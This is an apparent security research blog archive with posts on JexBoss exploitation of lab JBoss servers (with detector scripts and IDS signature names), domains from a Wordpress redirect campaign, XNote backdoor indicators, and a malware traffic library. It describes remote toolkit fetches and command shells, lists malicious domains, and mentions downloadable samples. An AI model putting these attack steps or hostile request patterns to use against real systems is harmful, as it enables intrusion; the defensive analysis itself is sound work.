Tuesday, April 12, 2016

JBoss exploits - View from a Victim



Over the past few months, the distribution vector for "Ransomware" has shifted to a more targeted approach.

Several hospitals and healthcare organizations recently found themselves the victim of a widespread Ransomware infection.
Exploits against JBoss are believed to be responsible for several of these incidents, where a compromised JBoss server allowed access to the hospital's internal network.

For an excellent writeup of Ransomware infections using the JBoss exploits, see the Cisco Talos blog: "SamSam: The Doctor Will See You, After He Pays the Ransom"
Note that "JexBoss" is described as the exploit tool of choice.  JexBoss exploits very old vulnerabilities in JBoss, and takes advantage of poor upgrading or patching policies.

Via Shodan or Google 'dorking', one can determine that there are a great deal of JBoss deployments.  
It is safe to assume that many of these deployments remain vulnerable.
While healthcare and hospitals are the target 'du jour', other high-profile industry segments running old JBoss may be targeted next.

In an effort to raise awareness to the JexBoss exploit and what it looks like from the victim's point of view, we stood up two vulnerable JBoss servers and exploited them using JexBoss.
We're providing some screen shots of JexBoss in action, along with the network packet captures from the vantage of the victim.  We also will provide a list of the Snort and Emerging Threat IDS signatures that currently alert on this traffic.

Our test environment consisted of two Amazon EC2 instances running RedHat linux.  I configured the first instance to run JBoss v6, and the other to run JBoss v4.
Please don't bother to test or "attack" the EC2 instances I used.  They are firewalled to the world, except to my IP :)
The attacking environment was a simple Debian linux VM with JexBoss installed.

Attacking JBoss 4

Running JexBoss against a vulnerable host is quite trivial.  You simply provide the URL of the JBoss instance and hit Enter.
The following image shows how JexBoss reported the JBoss web-console, jmx-console and JMXInvokerServlet as vulnerable.

JexBoss attack against a JBoss v4 host

In this example, I ran the exploit against jmx-console.  I then ran the linux 'ls' command to display the files on the compromised host.
Saying "Yes" to automated exploitation of jmx-console will instruct the victim server to pull a remote exploit toolkit named "jbossass.war" from 'joaomatosf.com'.

Victim server fetching remote exploit toolkit


Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.
Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.

In this next example, I ran the exploit against the JBoss web-console.
Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice.  Note how I used the 'curl' command to fetch a remote text file and display it on the console.


Using JexBoss to fetch a remote file via the compromised host.

In this example, I fetched the same file and saved it to the compromised host.  Running the linux 'ls' command after the fetch reveals the file is now resident on the JBoss host.

Using JexBoss to fetch and save a remote file to the compromised host.

Here is a look at a log segment from the victim host after the exploits were run.  A few exceptions are thrown, and Warnings and Info are logged.


Log file segment showing Warnings and Info after JexBoss exploit

Attacking JBoss v6

Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.
However, the jmx-console is as easily exploited as it was in JBoss version 4.

JexBoss exploit against the jmx-console on a JBoss v6 host


JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch

Summary:

By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.
With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it is of critical urgency that any JBoss instance be checked and patched.
I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.

A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at CVEDetails - JBoss
We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim.  We hope that this blog post helps raise further awareness to this serious threat, and provides some additional information to help detect and defend against these attacks.

Files and Additional Information:

IDS Signatures:

The following Snort and Emerging Threats IDS signatures will detect these JexBoss probes and exploits:

[1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe

[1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass

[1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt

[1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt

[1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt

[1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt
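The IDS signatures above cover the wire. As an added example (not part of the original post, and not JexBoss or JBoss code), here is a host-side complement: a small Python checker that reads web server access logs and flags the three endpoints the post shows JexBoss probing (jmx-console, web-console, JMXInvokerServlet), plus the query-string shape of a jmx-console operation that references a .war such as the "jbossass.war" toolkit. The log format (Apache combined) is assumed and the sample log lines are constructed; the deploy request in the sample is deliberately incomplete and serves only to exercise the detector.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints the post shows JexBoss probing and exploiting on JBoss 4 and 6.
JBOSS_ADMIN_PATHS = ("/jmx-console", "/web-console", "/invoker/JMXInvokerServlet")

# Apache combined log format (assumed); the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2016:10:01:02 +0000] "HEAD /jmx-console/ HTTP/1.1" 200 - "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2016:10:01:03 +0000] "HEAD /web-console/ HTTP/1.1" 200 - "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2016:10:01:04 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1283 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Apr/2016:10:01:09 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&methodName=deploy&arg0=http%3A%2F%2F198.51.100.9%2Fjbossass.war HTTP/1.1" 200 1536 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Apr/2016:10:02:00 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""


def analyze_line(line):
    """Return the list of findings for one log line; empty means nothing JBoss-related."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable line"]
    method, target = m.group("method"), m.group("target")
    parts = urlsplit(target)
    path = unquote(parts.path)
    findings = []
    for prefix in JBOSS_ADMIN_PATHS:
        if path == prefix or path.startswith(prefix + "/"):
            findings.append(f"request to JBoss admin endpoint {prefix}")
            break
    if not findings:
        return findings
    # JMXInvokerServlet accepts serialized Java invocations by POST; any such POST
    # from an untrusted client deserves a look.
    if method == "POST" and path.startswith("/invoker/JMXInvokerServlet"):
        findings.append("POST to JMXInvokerServlet (serialized invocation)")
    # HtmlAdaptor operations are driven by query parameters; action=invokeOp /
    # invokeOpByName is how MBean methods (deploy, store, ...) get called.
    action = (parse_qs(parts.query).get("action") or [""])[0]
    if action.startswith("invokeOp"):
        findings.append(f"jmx-console operation invocation ({action})")
    decoded_query = unquote(parts.query).lower()
    if ".war" in decoded_query:
        findings.append("deployment archive (.war) referenced in query string")
    if "jbossass" in decoded_query:
        findings.append("JexBoss toolkit name (jbossass) in query string")
    return findings


def suspicious_sources(log_text):
    """Map each client IP to its findings, keeping only IPs with at least one."""
    report = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        findings = analyze_line(line)
        if findings:
            m = LOG_RE.match(line)
            src = m.group("src") if m else "?"
            report.setdefault(src, []).extend(findings)
    return report


if __name__ == "__main__":
    for src, items in suspicious_sources(SAMPLE_LOG).items():
        print(src)
        for item in items:
            print("  -", item)
```

Any hit on these endpoints from outside the administrative network is worth an alert on its own; the three admin paths should not be reachable from the Internet at all, and a jmx-console request that names a .war is the deployment step the post describes.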

Packet Captures

JexBoss attack traffic - Vantage of a JBoss version 6 host:  

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):


Friday, February 12, 2016

Jan-Feb 2016 domains associated with "Admedia" Wordpress compromises (WP plugins)

We've been seeing a fair number of compromised Wordpress sites with various javascript plugins that are redirecting visitors to assorted malicious domains.

Sucuri discussed this in an excellent post: "Massive Admedia/Advertising iFrame Injection"

Since then, we've seen the URI construct of the redirection change from "/admedia/?" to "/megaadvertize/?keyword="

Currently the most popular redirect URLs appear to be:
http://vrot.stervapoimeniliana[.]info/megaadvertize/?keyword=<>
http://pon.krasnayadama[.]info/megaadvertize/?keyword=<>

All the redirect domains we've seen use the following as nameservers

  • gotl549293.mars.orderbox-dns[.]com
  • gotl549293.earth.orderbox-dns[.]com
  • gotl549293.venus.orderbox-dns[.]com
  • gotl549293.mercury.orderbox-dns[.]com

So to get an idea of what other domains might be used for this campaign, we looked at two things:
* Which domains are using these nameservers?
* Which domains have the email address "valera.valera-146.yandex.ru" in their DNS SOA records?
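The two pivots above, as an added example that is not part of the original post: a Python routine that takes a snapshot of nameserver sets and SOA RNAME values and returns the domains sharing either indicator. The snapshot is constructed (the two orderbox-dns nameservers and the mailbox come from the post; the other entries are made up to show what must not match). It assumes, as the hostnames suggest, that orderbox-dns.com is a nameserver service shared by many customers, so the account-specific first label (gotl549293) is the useful pivot rather than the provider domain. The mailbox is written in RFC 1035 RNAME form, where the dot inside the local part is escaped; the post shows it unescaped as the tool displayed it.

```python
# Constructed snapshot: domain -> (nameservers, SOA RNAME).
SNAPSHOT = {
    "stervapoimeniliana.info": (
        ["gotl549293.mars.orderbox-dns.com.", "gotl549293.earth.orderbox-dns.com."],
        r"valera\.valera-146.yandex.ru."),
    "krasnayadama.info": (
        ["gotl549293.venus.orderbox-dns.com.", "gotl549293.mercury.orderbox-dns.com."],
        r"valera\.valera-146.yandex.ru."),
    "same-mailbox.biz": (["ns1.example.net."], r"valera\.valera-146.yandex.ru."),
    "other-orderbox-customer.com": (["gotl111111.mars.orderbox-dns.com."], "admin.example.com."),
    "example-shop.com": (["ns1.example.com.", "ns2.example.com."], "hostmaster.example.com."),
}

KNOWN_NS_LABEL = "gotl549293"                 # customer-specific label on the shared hosts
KNOWN_MAILBOX = "valera.valera-146@yandex.ru"  # SOA contact from the post


def rname_to_email(rname):
    """Convert an SOA RNAME to a mailbox: the first unescaped '.' separates local part
    from domain, and a backslash-escaped dot inside the local part is literal (RFC 1035)."""
    rname = rname.rstrip(".")
    local, i = [], 0
    while i < len(rname):
        ch = rname[i]
        if ch == "\\" and i + 1 < len(rname):
            local.append(rname[i + 1])
            i += 2
            continue
        if ch == ".":
            return "".join(local) + "@" + rname[i + 1:]
        local.append(ch)
        i += 1
    return "".join(local)


def ns_account_label(ns_host):
    """First label of an orderbox-dns hostname, or None for any other provider."""
    host = ns_host.rstrip(".").lower()
    if host.endswith(".orderbox-dns.com"):
        return host.split(".", 1)[0]
    return None


def pivot(snapshot, ns_label=KNOWN_NS_LABEL, mailbox=KNOWN_MAILBOX):
    """Return {domain: [reason, ...]} for domains sharing the NS account label or SOA mailbox."""
    hits = {}
    for domain, (nameservers, rname) in snapshot.items():
        reasons = []
        if any(ns_account_label(ns) == ns_label for ns in nameservers):
            reasons.append(f"nameservers under orderbox-dns account label {ns_label}")
        if rname_to_email(rname).lower() == mailbox:
            reasons.append(f"SOA contact {mailbox}")
        if reasons:
            hits[domain] = reasons
    return hits


if __name__ == "__main__":
    for domain, reasons in sorted(pivot(SNAPSHOT).items()):
        print(domain, "->", "; ".join(reasons))
```

Pivoting on the provider domain alone would sweep in every other orderbox-dns customer (the fourth entry), which is why the account label is compared instead.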

Below is a list of the domains meeting these criteria:


barabawka.net
london88.pw
barada222.pw
suchka46.pw
easy-trading.biz
balw5ezvicz7hka.pw
balw5ezvicz7hka.pw
goroda235.pw
trymyfinger.website
trymyfinger.website
borodavka.website
zaleimneviskivgorlo.website
bababolka.website
daitepospatirodu.website
poprobyimoihyi.website
suchkakrawenaya.website
lovelyclub.biz
lovelygames.biz
tapochekmiwu.website
tapochekkati.website
tapochekmiwu.website
suchtozahyinya.com
golayagopa.website
goluivovka.website
goluivalerka.website
golayapipetka.website
golayazadnica.website
suchtozahyinya.com
batyaebetvseh.website
matyaebetvseh.website
rozovuiurka.website
rozovuimiwka.website
rozovuisawka.website
rozovuivasunya.website
mainlandpage.website
siniuurka.website
siniukolka.website
siniusawka.website
zaleimneviskivgorlo.website
chernuioleg.website
chernuikolya.website
chernuipetya.website
chernuisanya.website
kolhoznik.website
malenkiyprince.website
zaleimneviskivgorlo.website
beluidanya.website
beluilanya.website
beluisanya.website
beluitanya.website
beluivanya.website
beluidanya.website
seruidebil.website
seruisanya.website
seruitanya.website
seruidyatel.website
seruidolboeb.website
mainlandpage.website
zelenuiranya.website
zelenuisanya.website
zelenuitanya.website
zelenuivanya.website
meetclub.biz
borodatayagenwina.website
borodatuiloh.website
borodatuiotec.website
borodatuimyguk.website
borodayasobaka.website
easy-trading.biz
zo1lotayawlyapa.website
zol1otayawlyapa.website
zolo1tayawlyapa.website
zolot1ayawlyapa.website
zolota1yawlyapa.website
zolotay1awlyapa.website
zolotaya1wlyapa.website
zolotayaw1lyapa.website
zolotayawl1yapa.website
zolotayawly1apa.website
getallcooltraffic.com
trymysocks1.ws
trymysocks2.ws
trymysocks4.ws
trymysocks5.ws
forexmyways.com
gameforgods.com
ilovetradingz.com
nicefilmwatchs.com
realylovegames.com
surveyforyourss.com
watchlovedfilms.com
fastestmonkeymakes.com
moneyforfriends.net
pl1atiebeloe.ws
platie1beloe.ws
platieb1eloe.ws
getallcooltraffic.com
lovelygames.biz
nicefilmwatchs.com
watchlovedfilms.com
surveyforyourss.com
1n-dobloebu.ws
1n-dobloebu1.ws
1n-dobloebu2.ws
1n-dobloebu3.ws
gamingguidess.com
landpagegames.com
localpagegengames.com
moneyforfriends.net
zzzsleepy.ws
zzzsleepy1.ws
zzzsleepy2.ws
realylovegames.com
fastestmonkeymakes.com
zzzmaluw3.ws
zzzmaluw4.ws
gameforgods.com
ownfavoritesite.com
dearcustomersgogo.com
listenquicklypage.com
gameforgods.com
ilovetradingz.com
polnuewtaniwki.ws
p3olnuew3taniwki.ws
poln1uewt1aniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
polnuewtaniwki.ws
dearcustomersgogo.com
trackersystemsz.biz
barkdenboms.com
crazydomainfoq.com
p3olnuew3taniwki.ws
poln1uewt1aniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
dydochka12345.ws
lydochka12345.ws
vodochka12345.ws
mordochka12345.ws
collectinfoitemsz.com
findyourwaytotr.net
samplefasttrack.org
getmylovelyyy.com
dearcustomersgogo.com
polnuewtaniwki.ws
barkdenboms.com
listenquicklypage.com
trackersystemsz.biz
findyourwaytotr.net
goingfortraff.com
trackingzystem.com
findtrafficcount.com
p3olnuew3taniwki.ws
polnu4ewtan4iwki.ws
polnue2wtani2wki.ws
poln1uewt1aniwki.ws
barkdenboms.com
crazydomainfoq.com
fabosik12345.ws
nifnafbet.biz
nifnafbet.com
nifnafbet.net
nifnafbet.org
baltimoreprivet.biz
baltimoreprivet.org
baltimoreprivet.com
baltimoreprivet.net
dedulkasanya.biz
malenkiuniger.biz
oduvanchiksawa.biz
dedulkasanya.com
oduvanchiksawa.com
dedulkasanya.net
oduvanchiksawa.net
dedulkasanya.org
oduvanchiksawa.org
malenkiuniger.info
malenkiuniger.com
malenkiuniger.net
malenkiuniger.org
chrenovuihren.biz
chrenovuihren.com
bolwayazalypencuya.com
chrenovuihren.net
bolwayazalypencuya.net
chrenovuihren.org
bolwayazalypencuya.org
chrenovuihren.biz
babulkadayn.in.net
babulkasyka.in.net
forbetterget.in.net
babulkamaksim.in.net
bravayasuchka.in.net
nravayasuchka.in.net
pravayasuchka.in.net
wravayasuchka.in.net
poprobyipoprawaika.in.net
bravayasuchka.in.net
nravayasuchka.in.net
pravayasuchka.in.net
wravayasuchka.in.net
thatsbigidea.info
crazyfastestway.info
belayadama.info
serayadama.info
chernayadama.info
krasnayadama.info
stervapoimeniolya.info
stervapoimenialena.info
stervapoimenialina.info
stervapoimeniliana.info



Nearly all domain names are transliterated Russian word combinations.
Some of the domains registered by valera.valera-146@yandex.ru such as barabolka[.]com bear the Registrant Name: Valeriy Babosuch. - http://www.whoismind.com/whois/barabolka.com.html

This name is associated with the other domains listed below and with the registrant email address mindupper@gmail.com.

Domains registered by mindupper@gmail.com were made of mostly English language word combinations.

Some of the domains associated with Nuclear EK and with Pony/Fareit post-infection traffic were hosted on 162.247.12.207.  See more at:
http://malwaredb.malekal.com/url.php?netname=WFC
http://malwarefor.me/2015-04-26-nuclear-ek-dropping-ponyfareit/

162.247.12.207
https://www.virustotal.com/en/ip-address/162.247.12.207/information/
Country CA - Autonomous System 6939 (Hurricane Electric, Inc.)

Phishing (such as https://whois.domaintools.com/blondescript.net) was seen on 91.200.85.137



Passive DNS results for these two IP addresses reveal the domains. VirusTotal results show:

3/66 2016-01-10 15:49:37 http://givemeaudi . com/
4/66 2015-12-13 15:31:51 http://sampletds . net/
4/66 2015-11-25 09:25:32 http://yellowfrance . info/
2/67 2015-11-22 04:21:10 http://sampletds . org/
1/66 2015-11-20 10:51:43 http://yellowfrance . com/
3/63 2015-07-19 14:33:43 http://sampletds . info/
6/63 2015-06-08 01:03:04 http://www . yellowfrance . info/
4/63 2015-05-19 09:43:33 http://yellowfrance . com/wRJrUHURtdt20 . html
3/63 2015-04-30 15:37:56 http://yellowfrance . com/HelVGnsIlBR20 . html
3/62 2015-04-21 14:30:13 http://yellowfrance . com/falJTWHvsFU20 . html
6/62 2015-04-21 13:35:51 http://yellowfrance . info/qYCrsJuHWhE20 . html
3/62 2015-04-17 10:49:08 http://yellowfrance . com/sHrWgPcxdvy20 . html
6/62 2015-04-16 02:21:39 http://yellowfrance . info/woMbVHaDOfk20 . html
6/62 2015-04-15 19:46:12 http://yellowfrance . info/HXndqXghAHy20 . html
6/62 2015-04-15 19:45:57 http://yellowfrance . info/ppmerkzbRUk20 . html
2/62 2015-04-15 18:57:31 http://givemeaudi . com/ZlqkpeqDQoy20 . html
6/62 2015-04-15 18:33:34 http://yellowfrance . info/JYndncMIRlu20 . html
6/62 2015-04-15 14:31:15 http://yellowfrance . info/vTGmbyYZBGB20 . html
6/62 2015-04-13 14:23:58 http://yellowfrance . info/YRgyxhPwalE20 . html
1/62 2015-04-09 19:58:58 http://givemeaudi . com/jWRihuJevxB20 . html
6/62 2015-04-09 15:12:33 http://yellowfrance . info/LqLEqeicSXT20 . html
6/62 2015-04-09 15:12:15 http://yellowfrance . info/RhFaRmFvnhE20 . html
3/62 2015-04-09 02:35:13 http://yellowfrance . info/qXgxBLvENoH20 . html
4/62 2015-04-08 11:49:18 http://yellowfrance . info/LEZrGknOuaD20 . html
3/62 2015-04-07 18:33:32 http://yellowfrance . info/BaKYxblgbHt20 . html
3/62 2015-04-07 10:44:09 http://yellowfrance . info/gUoyLbRBcJw20 . html
3/62 2015-04-06 18:55:57 http://yellowfrance . info/AomQXriDFBd20 . html
3/62 2015-04-06 05:21:23 http://yellowfrance . info/rIoeSAnGUuf20 . html
3/62 2015-04-03 20:32:58 http://yellowfrance . info/wpwssjkpevc20 . html
3/62 2015-04-02 14:30:25 http://yellowfrance . info/cLFHmTVqCEW20 . html
3/62 2015-04-02 13:11:26 http://yellowfrance . info/KyLpyRWHMUb20 . html
2/62 2015-04-01 12:08:35 http://yellowfrance . info/GNuCrxcJYcP20 . html
2/62 2015-04-01 10:06:37 http://yellowfrance . info/lvNbgtiyxOu20 . html
1/62 2015-04-01 01:53:08 http://yellowfrance . info/inDOFfbujAt20 . html
1/62 2015-04-01 00:23:39 http://yellowfrance . info/vvBdLhNoChB20 . html
1/62 2015-03-31 23:59:50 http://yellowfrance . info/pAJQxOsQxXP20 . html
1/62 2015-03-17 02:16:12 http://sampletds . org/cevch18 . html
1/62 2015-03-16 19:42:09 http://sampletds . org/ANcXoDpCldL20 . html
1/62 2015-03-12 17:48:28 http://sampletds . info/in . cgi?
1/62 2015-03-12 15:47:25 http://sampletds . net/in . cgi?20&CS=1
1/62 2015-03-12 13:48:35 http://sampletds . net/in . cgi?20&CS=1
1/62 2015-03-12 13:43:03 http://sampletds . net/SfzYoUZLuDw20 . html
2/52 2014-05-23 14:11:51 http://theviagrapills . com/?1


Registrant Name: Valeriy Babosuch
Registrant Organization: 
Registrant Street: Truhanovskaya 45
Registrant City: Moscow
Registrant State/Province: N/A
Registrant Postal Code: 121497
Registrant Country: RU
Registrant Phone: +7 . 9453466645
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: mindupper@gmail.com


Compromises in CMS platforms, including Wordpress, Joomla!, and Drupal, remain a significant threat. Detecting the malicious redirect via the URI construct is useful; however, the attacker often changes it quickly.  To improve awareness and detection, we wanted to provide this list of domains that may be related to this active Wordpress compromise.

Monday, February 9, 2015

Linux.BackDoor.XNote.1 indicators

We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.
Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: http://blog.malwaremustdie.org/

Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote', that opens a backdoor on the compromised host.  The host is then used for a variety of functions, including as a DDoS bot.
The DrWeb posts provide a very good analysis of the malware and its overall structure.
http://news.drweb.com/show/?i=9272&lng=en&c=5
http://vms.drweb.com/virus/?i=4323517

We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.

Upon execution, we noted the sample contacting a DNS server at 114.114.114.114 with queries for the following domains:

  • a.et2046.com
  • b.et2046.com
  • c.et2046.com
For each query, the IP address 122.10.85.54 was returned.

In our run, the malicious 'xnote' process had process ID 1303. Using 'volatility' to map information about the process memory, we noted:
Volatility Foundation Volatility Framework 2.4
Pid  Start      End        Flags Pgoff    Major Minor Inode  Path              
1303   0xc01000   0xc02000 r-x        0x0     8     1 405848 /home/mattyh/xnote
1303  0x8048000  0x81ba000 r-x        0x0     0     0      0                   
1303  0x81ba000  0x81c4000 rwx        0x0     0     0      0                   
1303  0xa137000  0xa158000 rwx        0x0     0     0      0 [heap]            
1303 0xb78b6000 0xb78b7000 r-x        0x0     0     0      0 [vdso]            
1303 0xbf843000 0xbf859000 rwx        0x0     0     0      0 [stack]

Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.

XXXXXXXXXXXXXXXX122.10.85.54
a.et2046.com
b.et2046.com
c.et2046.com
e.et2046.com
test
CAk[S
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
.,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF
-0123456789

-0123456789


Domain and IP Information:

It is interesting to note that the domain "et2046.com" has been seen before in other Linux ELF malware.
  • Note this post to an Ubuntu forum from May, 2014 where the subdomains 'kill.et2046.com' and 'sb.et2046.com' were noted in a running process on a compromised Ubuntu host.
  • Malware Must Die posted an analysis of the Linux iptablex malware where these domains were also seen:
  • Via VirusTotal searches, we find related malware to these domains:


Obtaining Passive DNS information from FarSight Security's DNSDB, we see that currently for IP address 122.10.85.54 the only DNS records are:

www.qtol.tv. A 122.10.85.54

Additional information from DNSDB for the domain et2046.com:

count 54
first seen in zone file 2014-11-12 17:13:42 -0000
last seen in zone file 2015-01-13 17:23:33 -0000
et2046.com. NS a.dnspod.com.
et2046.com. NS b.dnspod.com.
et2046.com. NS c.dnspod.com.


count 329
first seen in zone file 2013-12-17 17:13:33 -0000
last seen in zone file 2014-11-11 17:12:29 -0000
et2046.com. NS ns155.dnsever.com.
et2046.com. NS ns165.dnsever.com.
et2046.com. NS ns179.dnsever.com

Note that the malware uses a hardcoded DNS server on 114.114.114.114 to provide all domain resolution.   This is a public DNS server based in China, with its web page at www.114dns.com
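A hardcoded resolver is a detection opportunity in its own right: a host that sends DNS queries anywhere other than the resolvers it was configured with is either misconfigured or running something that brought its own. As an added example (not part of the original post), the Python below reads DNS query records and flags, per source host, queries sent to a non-approved resolver and queries for the et2046.com names from the post. The record format and the approved-resolver list are assumptions, and the sample records are constructed.

```python
from collections import defaultdict

# Resolvers your hosts are supposed to use (constructed for this example).
APPROVED_RESOLVERS = {"10.0.0.2", "10.0.0.3"}
# Apex domains from the post; any subdomain matches too.
WATCH_DOMAINS = {"et2046.com"}

# Constructed query records, "timestamp src dst qtype qname", as a DNS sensor
# or firewall log might export them.
SAMPLE_QUERIES = """\
2015-02-09T14:00:01 10.0.0.5 10.0.0.2 A www.example.com
2015-02-09T14:00:02 10.0.0.9 114.114.114.114 A a.et2046.com
2015-02-09T14:00:02 10.0.0.9 114.114.114.114 A b.et2046.com
2015-02-09T14:00:03 10.0.0.9 114.114.114.114 A c.et2046.com
2015-02-09T14:00:10 10.0.0.5 10.0.0.2 A mail.example.com
2015-02-09T14:00:12 10.0.0.7 8.8.8.8 A www.example.org
"""


def parse_queries(text):
    """Parse the whitespace-separated records into dicts; names are lowercased, no trailing dot."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, qtype, qname = line.split()
        rows.append({"ts": ts, "src": src, "dst": dst, "qtype": qtype,
                     "qname": qname.rstrip(".").lower()})
    return rows


def on_watchlist(qname):
    """True for the apex itself or any name under it, never for look-alike suffixes."""
    return any(qname == d or qname.endswith("." + d) for d in WATCH_DOMAINS)


def analyze(rows, approved=APPROVED_RESOLVERS):
    """Return {src_ip: [finding, ...]} for hosts with at least one finding."""
    findings = defaultdict(list)
    for r in rows:
        if r["dst"] not in approved:
            findings[r["src"]].append(
                f"DNS query sent to non-approved resolver {r['dst']} for {r['qname']}")
        if on_watchlist(r["qname"]):
            findings[r["src"]].append(f"query for watchlisted name {r['qname']}")
    return dict(findings)


def suspicious_hosts(rows):
    """Sorted list of source IPs that produced any finding."""
    return sorted(analyze(rows))


if __name__ == "__main__":
    for host, items in analyze(parse_queries(SAMPLE_QUERIES)).items():
        print(host)
        for item in items:
            print("  -", item)
```

The resolver check catches this family even after the domains change, and the same policy enforced at the egress firewall (only the approved resolvers may be reached on port 53) both breaks the malware's name resolution and turns the blocked attempts into log entries.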



whois - 114.114.114.114

inetnum:        114.114.0.0 - 114.114.255.255
netname:        XFInfo
descr:          NanJing XinFeng Information Technologies, Inc.
descr:          Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road
descr:          Xuanwu District, Nanjing, Jiangsu, China
country:        CN
irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn

person:         Yan Jian
nic-hdl:        YJ1777-AP
e-mail:         jyan@greatbit.com

person:         Zhao Zhenping
nic-hdl:        ZZ2094-AP
e-mail:         ping@greatbit.com

whois - 122.10.85.54

inetnum:        122.10.80.0 - 122.10.95.255
netname:        TOINTER-CN
descr:          Royal Network Technology Co., Ltd. in Guangzhou
country:        HK
admin-c:        WX2631-AP
tech-c:         WX2631-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CN-TOINTER122
mnt-irt:        IRT-TOINTER-CN
changed:        tengdayx@gmail.com 20150112
source:         APNIC

irt:            IRT-TOINTER-CN
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360
e-mail:         abuse@gzroyal.cn
abuse-mailbox:  abuse@gzroyal.cn
admin-c:        RNTC1-AP
tech-c:         RNTC1-AP
auth:           # Filtered
mnt-by:         MAINT-TOINTER-CN
changed:        hm-changed@apnic.net 20140919
source:         APNIC

person:         Wei XeiJun
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533
country:        CN
phone:          +86.1234567890
e-mail:         tengdayx@qq.com
nic-hdl:        WX2631-AP
mnt-by:         MAINT-TOINTER-CN
changed:        tengdayx@qq.com 20150111


'whois' for Domain et2046.com

Domain Name: ET2046.COM
Registry Domain ID: 1762221508_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-08-25T06:58:17Z
Creation Date: 2012-11-27T14:02:55Z
Registrar Registration Expiration Date: 2016-11-27T14:02:55Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505

Registry Registrant ID: 
Registrant Name: smaina smaina
Registrant Organization: 
Registrant Street: Beijing
Registrant City: Beijing
Registrant State/Province: Beijing
Registrant Postal Code: 100080
Registrant Country: China
Registrant Phone: +86.18622222222
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: tuhao550@gmail.com


-----------------------------------------------------------------------------------------------------------------------
(Uses same password scheme as Contagio.  Ping me or Mila for details if needed)

Thursday, February 5, 2015

Library of Malware Traffic Patterns


Update February 2015 
Use the new link below for a new interface and updates.

Traffic analysis has been the primary method of malware identification, and the thousands of IDS signatures developed are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features if you don't have access to a well-designed and constantly updated malware database. This started as a "personal notes" spreadsheet with GET and POST requests for different malware families, with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

List of malware families and available downloads for their samples and pcaps (click on the link above for the full post)


Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

